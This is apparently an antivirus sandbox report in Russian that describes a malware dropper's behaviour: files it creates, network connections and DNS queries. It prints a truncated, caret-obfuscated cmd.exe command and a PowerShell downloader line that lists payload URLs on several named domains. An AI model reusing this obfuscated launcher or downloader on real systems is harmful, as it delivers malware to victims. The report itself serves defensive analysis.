Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\jzn.exe
Сетевая активность
Подключается к
- 'tr####ampung.com':80
- 'mu######yserviciosayala.com':80
TCP
Запросы HTTP GET
- http://tr####ampung.com/e2lJRqXOM
- http://mu######yserviciosayala.com/9vApTkdic5
UDP
- DNS ASK st##100.biz
- DNS ASK on#####registration.com
- DNS ASK ma###casano.it
- DNS ASK tr####ampung.com
- DNS ASK mu######yserviciosayala.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $qin='JHh';$iRX='http://st##100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@http://mudanzasyserviciosayala.com/9vApTkdi...
